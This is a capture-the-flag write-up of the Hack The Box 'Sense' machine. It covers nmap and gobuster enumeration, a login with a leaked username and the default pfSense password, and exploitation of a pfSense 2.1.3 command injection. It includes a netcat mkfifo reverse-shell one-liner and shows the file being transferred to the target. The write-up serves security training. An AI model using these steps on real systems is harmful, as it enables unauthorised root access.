Sense Writeup

21 September 2022 #CTF #HTB #box #easy #linux

sense info


I sense an nmap scan is coming:

$ sudo nmap -p- -T4 -oN enum/fulltcp.nmap
80/tcp  open  http
443/tcp open  https
$ ports=$(awk -F/ '/^[[:digit:]]{1,5}\// {printf "%s,", $1}' enum/fulltcp.nmap)
$ sudo nmap -p $ports -sCV -oN enum/scripts.nmap
80/tcp  open  http       lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to
443/tcp open  ssl/https?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after:  2023-04-06T19:21:35


We get the classic pfSense login page:

pfSense login page

Tried default creds 'admin:pfsense' but don't get in.

Time to bruteforce directories:

$ gobuster dir -k -u -x php,html,txt,cgi,sh -t 40 -o enum/root.gobuster -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
/changelog.txt        (Status: 200) [Size: 271]
/system-users.txt     (Status: 200) [Size: 106]

(This will probably take more than 1 hour to complete)

Note that 'system-users' is not in any of the 'raft' wordlists, you had to use directory-list-2.3-medium.txt or bigger to find this file (I guess that explains the low ratings for this box).

$ curl -k
# Security Changelog

### Issue
There was a failure in updating the firewall. Manual patching is therefore required

### Mitigated
2 of 3 vulnerabilities have been patched.

### Timeline
The remaining patches will be installed during the next maintenance window
$ curl -k
####Support ticket###

Please create the following user

username: Rohit
password: company defaults

The changelog tells us there still a vulnerabilitiy that hasn't been patched yet.

We have a username and the password is the default pfsense password (pfsense).

Log in with 'rohit:pfsense' (not 'Rohit'):

pfSense dashboard

We have a version, let's check for exploits:

$ searchsploit 'pfsense 2.1.3'
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection

There is a python script for this exploit but it did not work for me.


The command injection is found in the 'database' parameter:

Burp repeater

I have found that using sleep is the best way to check for code execution when you don't have output.

We want a reverse shell, but this is a BSD box, so bash might not be installed. We can check if it is with this payload:


If which bash is successful, sleep 2 will be executed (%26%26 -> &&)

Spoiler: it is not, but nc is. Fine, we'll use the 'Netcat OpenBsd' reverse shell from this cheat sheet.

The way I got this to work is by copying the reverse shell paylaod to a file on my local box:

$ echo 'rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4242 >/tmp/f' > rev

Then transfer the file to the target box:

$ nc -lvnp 4242 < rev

And in Burp:


(You may need to ctrl+c the nc on your box if it does not terminate by itself)

Now that the file is on the target box, just execute it


(Don't forget to relaunch you nc handler)

And we get a shell as root on the box!

Key Takeaways